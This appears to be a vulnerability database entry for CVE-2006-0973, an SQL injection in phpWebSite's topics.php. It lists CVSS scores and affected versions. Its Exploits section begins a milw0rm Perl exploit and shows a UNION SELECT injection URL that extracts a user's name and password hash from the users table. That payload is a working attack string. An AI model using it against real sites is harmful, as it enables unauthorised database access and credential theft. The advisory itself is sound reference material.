7.5
CVSSv2

CVE-2006-0973

Published: 03/03/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in topics.php in Appalachian State University phpWebSite 0.10.2 and previous versions allows remote malicious users to execute arbitrary SQL commands via the topic parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

phpwebsite phpwebsite 0.10.1

phpwebsite phpwebsite 0.10.2

phpwebsite phpwebsite 0.7.3

phpwebsite phpwebsite 0.9.3.4

phpwebsite phpwebsite 0.8.2

phpwebsite phpwebsite 0.8.3

phpwebsite phpwebsite 0.9.3

phpwebsite phpwebsite 0.9.3.1

phpwebsite phpwebsite 0.10

phpwebsite phpwebsite 0.9.3.2

phpwebsite phpwebsite 0.9.3.3

Exploits

#!/usr/bin/perl # # advisory sent in by SnIpEr_SA (selfar2002[at]hotmailcom) # wwwtargetcom/topicsphp?op=viewtopic&topic=-1%20Union%20select%20name,name,pass,name%20From%20users%20where%20uid=1 # ported by str0ke (milw0rmcom) from x97Rangs code (RST/GHC) rstvoidru use LWP::Simple; $serv = $ARGV[0]; $path = $ARG ...